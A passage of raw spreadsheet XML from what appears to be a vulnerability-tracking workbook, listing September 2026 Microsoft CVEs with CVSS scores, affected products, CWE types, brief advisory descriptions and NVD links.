t="inlineStr"><is><t>CWE-121</t></is></c><c r="R316" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S316" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69722</t></is></c></row><row r="317"><c r="A317" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B317" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C317" s="5" t="inlineStr"><is><t>CVE-2026-69724</t></is></c><c r="D317" s="5" t="n"><v>8.800000000000001</v></c><c r="E317" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F317" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G317" s="5" t="inlineStr" /><c r="H317" s="5" t="n"><v>0.008</v></c><c r="I317" s="5" t="inlineStr" /><c r="J317" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K317" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L317" s="5" t="inlineStr" /><c r="M317" s="5" t="inlineStr" /><c r="N317" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O317" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P317" s="5" t="inlineStr" /><c r="Q317" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R317" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t></is></c><c r="S317" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69724</t></is></c></row><row r="318"><c r="A318" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B318" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C318" s="5" t="inlineStr"><is><t>CVE-2026-69729</t></is></c><c r="D318" s="5" t="n"><v>8.800000000000001</v></c><c r="E318" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F318" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G318" s="5" t="inlineStr" /><c r="H318" s="5" t="n"><v>0.008999999999999999</v></c><c r="I318" s="5" t="inlineStr" /><c r="J318" s="5" t="inlineStr" /><c r="K318" s="5" t="inlineStr" /><c r="L318" s="5" t="inlineStr" /><c r="M318" s="5" t="inlineStr" /><c r="N318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O318" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P318" s="5" t="inlineStr" /><c r="Q318" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R318" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to execute code over a network.</t></is></c><c r="S318" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69729</t></is></c></row><row r="319"><c r="A319" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B319" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C319" s="5" t="inlineStr"><is><t>CVE-2026-69740</t></is></c><c r="D319" s="5" t="n"><v>8.800000000000001</v></c><c r="E319" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F319" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G319" s="5" t="inlineStr" /><c r="H319" s="5" t="n"><v>0.003</v></c><c r="I319" s="5" t="inlineStr" /><c r="J319" s="5" t="inlineStr" /><c r="K319" s="5" t="inlineStr" /><c r="L319" s="5" t="inlineStr" /><c r="M319" s="5" t="inlineStr" /><c r="N319" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P319" s="5" t="inlineStr" /><c r="Q319" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R319" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S319" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69740</t></is></c></row><row r="320"><c r="A320" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B320" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C320" s="5" t="inlineStr"><is><t>CVE-2026-69742</t></is></c><c r="D320" s="5" t="n"><v>8.800000000000001</v></c><c r="E320" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F320" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G320" s="5" t="inlineStr" /><c r="H320" s="5" t="n"><v>0.008</v></c><c r="I320" s="5" t="inlineStr" /><c r="J320" s="5" t="inlineStr" /><c r="K320" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:publisher</t></is></c><c r="L320" s="5" t="inlineStr" /><c r="M320" s="5" t="inlineStr" /><c r="N320" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O320" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P320" s="5" t="inlineStr" /><c r="Q320" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R320" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Office Publisher allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S320" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69742</t></is></c></row><row r="321"><c r="A321" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B321" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C321" s="5" t="inlineStr"><is><t>CVE-2026-69759</t></is></c><c r="D321" s="5" t="n"><v>8.800000000000001</v></c><c r="E321" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F321" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G321" s="5" t="inlineStr" /><c r="H321" s="5" t="n"><v>0.008</v></c><c r="I321" s="5" t="inlineStr" /><c r="J321" s="5" t="inlineStr" /><c r="K321" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L321" s="5" t="inlineStr" /><c r="M321" s="5" t="inlineStr" /><c r="N321" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O321" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P321" s="5" t="inlineStr" /><c r="Q321" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R321" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S321" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69759</t></is></c></row><row r="322"><c r="A322" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B322" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C322" s="5" t="inlineStr"><is><t>CVE-2026-69764</t></is></c><c r="D322" s="5" t="n"><v>8.800000000000001</v></c><c r="E322" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F322" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G322" s="5" t="inlineStr" /><c r="H322" s="5" t="n"><v>0.008</v></c><c r="I322" s="5" t="inlineStr" /><c r="J322" s="5" t="inlineStr" /><c r="K322" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L322" s="5" t="inlineStr" /><c r="M322" s="5" t="inlineStr" /><c r="N322" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O322" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P322" s="5" t="inlineStr" /><c r="Q322" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R322" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S322" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69764</t></is></c></row><row r="323"><c r="A323" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B323" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C323" s="5" t="inlineStr"><is><t>CVE-2026-69767</t></is></c><c r="D323" s="5" t="n"><v>8.800000000000001</v></c><c r="E323" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F323" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G323" s="5" t="inlineStr" /><c r="H323" s="5" t="n"><v>0.008</v></c><c r="I323" s="5" t="inlineStr" /><c r="J323" s="5" t="inlineStr" /><c r="K323" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L323" s="5" t="inlineStr" /><c r="M323" s="5" t="inlineStr" /><c r="N323" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O323" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P323" s="5" t="inlineStr" /><c r="Q323" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R323" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S323" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69767</t></is></c></row><row r="324"><c r="A324" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B324" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C324" s="5" t="inlineStr"><is><t>CVE-2026-69772</t></is></c><c r="D324" s="5" t="n"><v>8.800000000000001</v></c><c r="E324" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F324" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G324" s="5" t="inlineStr" /><c r="H324" s="5" t="n"><v>0.008</v></c><c r="I324" s="5" t="inlineStr" /><c r="J324" s="5" t="inlineStr" /><c r="K324" s="5" t="inlineStr" /><c r="L324" s="5" t="inlineStr" /><c r="M324" s="5" t="inlineStr" /><c r="N324" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O324" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P324" s="5" t="inlineStr" /><c r="Q324" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R324" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Network File System allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S324" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69772</t></is></c></row><row r="325"><c r="A325" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B325" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C325" s="5" t="inlineStr"><is><t>CVE-2026-69778</t></is></c><c r="D325" s="5" t="n"><v>8.800000000000001</v></c><c r="E325" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F325" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G325" s="5" t="inlineStr" /><c r="H325" s="5" t="n"><v>0.008</v></c><c r="I325" s="5" t="inlineStr" /><c r="J325" s="5" t="inlineStr" /><c r="K325" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L325" s="5" t="inlineStr" /><c r="M325" s="5" t="inlineStr" /><c r="N325" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O325" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P325" s="5" t="inlineStr" /><c r="Q325" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R325" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S325" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69778</t></is></c></row><row r="326"><c r="A326" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B326" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C326" s="5" t="inlineStr"><is><t>CVE-2026-69784</t></is></c><c r="D326" s="5" t="n"><v>8.800000000000001</v></c><c r="E326" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F326" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G326" s="5" t="inlineStr" /><c r="H326" s="5" t="n"><v>0.003</v></c><c r="I326" s="5" t="inlineStr" /><c r="J326" s="5" t="inlineStr" /><c r="K326" s="5" t="inlineStr" /><c r="L326" s="5" t="inlineStr" /><c r="M326" s="5" t="inlineStr" /><c r="N326" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O326" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P326" s="5" t="inlineStr" /><c r="Q326" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R326" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S326" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69784</t></is></c></row><row r="327"><c r="A327" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B327" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C327" s="5" t="inlineStr"><is><t>CVE-2026-69797</t></is></c><c r="D327" s="5" t="n"><v>8.800000000000001</v></c><c r="E327" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F327" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G327" s="5" t="inlineStr" /><c r="H327" s="5" t="n"><v>0.008</v></c><c r="I327" s="5" t="inlineStr" /><c r="J327" s="5" t="inlineStr" /><c r="K327" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L327" s="5" t="inlineStr" /><c r="M327" s="5" t="inlineStr" /><c r="N327" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O327" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P327" s="5" t="inlineStr" /><c r="Q327" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R327" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S327" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69797</t></is></c></row><row r="328"><c r="A328" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B328" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C328" s="5" t="inlineStr"><is><t>CVE-2026-69860</t></is></c><c r="D328" s="5" t="n"><v>8.800000000000001</v></c><c r="E328" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F328" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G328" s="5" t="inlineStr" /><c r="H328" s="5" t="n"><v>0.008</v></c><c r="I328" s="5" t="inlineStr" /><c r="J328" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K32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28" s="5" t="inlineStr" /><c r="M328" s="5" t="inlineStr" /><c r="N328" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O328" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P328" s="5" t="inlineStr" /><c r="Q328" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R328" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S328" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69860</t></is></c></row><row r="329"><c r="A329" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B329" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C329" s="5" t="inlineStr"><is><t>CVE-2026-70178</t></is></c><c r="D329" s="5" t="n"><v>8.800000000000001</v></c><c r="E329" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F329" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G329" s="5" t="inlineStr" /><c r="H329" s="5" t="n"><v>0.004</v></c><c r="I329" s="5" t="inlineStr" /><c r="J329" s="5" t="inlineStr" /><c r="K329" s="5" t="inlineStr"><is><t>microsoft:fabric</t></is></c><c r="L329" s="5" t="inlineStr" /><c r="M329" s="5" t="inlineStr" /><c r="N329" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O329" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P329" s="5" t="inlineStr" /><c r="Q329" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R329" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Fabric allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S329" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70178</t></is></c></row><row r="330"><c r="A330" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B330" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C330" s="5" t="inlineStr"><is><t>CVE-2026-70203</t></is></c><c r="D330" s="5" t="n"><v>8.800000000000001</v></c><c r="E330" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F330" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G330" s="5" t="inlineStr" /><c r="H330" s="5" t="n"><v>0.008</v></c><c r="I330" s="5" t="inlineStr" /><c r="J330" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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30" s="5" t="inlineStr" /><c r="M330" s="5" t="inlineStr" /><c r="N330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O330" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P330" s="5" t="inlineStr" /><c r="Q330" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R330" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S330" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t></is></c></row><row r="331"><c r="A331" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B331" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C331" s="5" t="inlineStr"><is><t>CVE-2026-70351</t></is></c><c r="D331" s="5" t="n"><v>8.800000000000001</v></c><c r="E331" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F331" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G331" s="5" t="inlineStr" /><c r="H331" s="5" t="n"><v>0.008</v></c><c r="I331" s="5" t="inlineStr" /><c r="J331" s="5" t="inlineStr" /><c r="K331" s="5" t="inlineStr" /><c r="L331" s="5" t="inlineStr" /><c r="M331" s="5" t="inlineStr" /><c r="N331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O331" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P331" s="5" t="inlineStr" /><c r="Q331" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R331" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft WebP Image Extension allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S331" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70351</t></is></c></row><row r="332"><c r="A332" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B332" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C332" s="5" t="inlineStr"><is><t>CVE-2026-70586</t></is></c><c r="D332" s="5" t="n"><v>8.800000000000001</v></c><c r="E332" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F332" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G332" s="5" t="inlineStr" /><c r="H332" s="5" t="n"><v>0.008</v></c><c r="I332" s="5" t="inlineStr" /><c r="J332" s="5" t="inlineStr" /><c r="K332" s="5" t="inlineStr" /><c r="L332" s="5" t="inlineStr" /><c r="M332" s="5" t="inlineStr" /><c r="N332" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P332" s="5" t="inlineStr" /><c r="Q332" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R332" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Paint allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S332" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70586</t></is></c></row><row r="333"><c r="A333" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B333" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C333" s="5" t="inlineStr"><is><t>CVE-2026-71328</t></is></c><c r="D333" s="5" t="n"><v>8.800000000000001</v></c><c r="E333" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F333" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G333" s="5" t="inlineStr" /><c r="H333" s="5" t="n"><v>0.006</v></c><c r="I333" s="5" t="inlineStr" /><c r="J333" s="5" t="inlineStr" /><c r="K333" s="5" t="inlineStr"><is><t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t></is></c><c r="L333" s="5" t="inlineStr" /><c r="M333" s="5" t="inlineStr" /><c r="N333" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O333" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P333" s="5" t="inlineStr" /><c r="Q333" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R333" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S333" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t></is></c></row><row r="334"><c r="A334" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B334" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C334" s="5" t="inlineStr"><is><t>CVE-2026-71336</t></is></c><c r="D334" s="5" t="n"><v>8.800000000000001</v></c><c r="E334" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F334" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G334" s="5" t="inlineStr" /><c r="H334" s="5" t="n"><v>0.008999999999999999</v></c><c r="I334" s="5" t="inlineStr" /><c r="J334" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K334" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L334" s="5" t="inlineStr" /><c r="M334" s="5" t="inlineStr" /><c r="N334" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O334" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P334" s="5" t="inlineStr" /><c r="Q334" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R334" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t></is></c><c r="S334" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t></is></c></row><row r="335"><c r="A335" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B335" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C335" s="5" t="inlineStr"><is><t>CVE-2026-71352</t></is></c><c r="D335" s="5" t="n"><v>8.800000000000001</v></c><c r="E335" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F335" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G335" s="5" t="inlineStr" /><c r="H335" s="5" t="n"><v>0.007</v></c><c r="I335" s="5" t="inlineStr" /><c r="J335" s="5" t="inlineStr" /><c r="K335" s="5" t="inlineStr" /><c r="L335" s="5" t="inlineStr" /><c r="M335" s="5" t="inlineStr" /><c r="N335" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P335" s="5" t="inlineStr" /><c r="Q335" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="R335" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows Remote Access Connection Manager allows an authorized attacker to execute code over a network.</t></is></c><c r="S335" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71352</t></is></c></row><row r="336"><c r="A336" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B336" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C336" s="5" t="inlineStr"><is><t>CVE-2026-71963</t></is></c><c r="D336" s="5" t="n"><v>8.800000000000001</v></c><c r="E336" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G336" s="5" t="inlineStr" /><c r="H336" s="5" t="n"><v>0.008999999999999999</v></c><c r="I336" s="5" t="inlineStr" /><c r="J336" s="5" t="inlineStr" /><c r="K336" s="5" t="inlineStr" /><c r="L336" s="5" t="inlineStr" /><c r="M336" s="5" t="inlineStr" /><c r="N336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O336" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P336" s="5" t="inlineStr" /><c r="Q336" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R336" s="5" t="inlineStr"><is><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is></c><c r="S336" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71963</t></is></c></row><row r="337"><c r="A337" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B337" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C337" s="5" t="inlineStr"><is><t>CVE-2026-72933</t></is></c><c r="D337" s="5" t="n"><v>8.800000000000001</v></c><c r="E337" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F337" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G337" s="5" t="inlineStr" /><c r="H337" s="5" t="n"><v>0.008</v></c><c r="I337" s="5" t="inlineStr" /><c r="J337" s="5" t="inlineStr" /><c r="K337" s="5" t="inlineStr" /><c r="L337" s="5" t="inlineStr" /><c r="M337" s="5" t="inlineStr" /><c r="N337" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P337" s="5" t="inlineStr" /><c r="Q337" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R337" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft WDAC OLE DB provider for SQL allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S337" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72933</t></is></c></row><row r="338"><c r="A338" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B338" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C338" s="5" t="inlineStr"><is><t>CVE-2026-72940</t></is></c><c r="D338" s="5" t="n"><v>8.800000000000001</v></c><c r="E338" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F338" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G338" s="5" t="inlineStr" /><c r="H338" s="5" t="n"><v>0.008</v></c><c r="I338" s="5" t="inlineStr" /><c r="J338" s="5" t="inlineStr" /><c r="K338" s="5" t="inlineStr" /><c r="L338" s="5" t="inlineStr" /><c r="M338" s="5" t="inlineStr" /><c r="N338" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P338" s="5" t="inlineStr" /><c r="Q338" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R338" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Schannel allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S338" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72940</t></is></c></row><row r="339"><c r="A339" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B339" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C339" s="5" t="inlineStr"><is><t>CVE-2026-72950</t></is></c><c r="D339" s="5" t="n"><v>8.800000000000001</v></c><c r="E339" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F339" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G339" s="5" t="inlineStr" /><c r="H339" s="5" t="n"><v>0.008999999999999999</v></c><c r="I339" s="5" t="inlineStr" /><c r="J339" s="5" t="inlineStr" /><c r="K339" s="5" t="inlineStr" /><c r="L339" s="5" t="inlineStr" /><c r="M339" s="5" t="inlineStr" /><c r="N339" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P339" s="5" t="inlineStr" /><c r="Q339" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R339" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="S339" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72950</t></is></c></row><row r="340"><c r="A340" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B340" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C340" s="5" 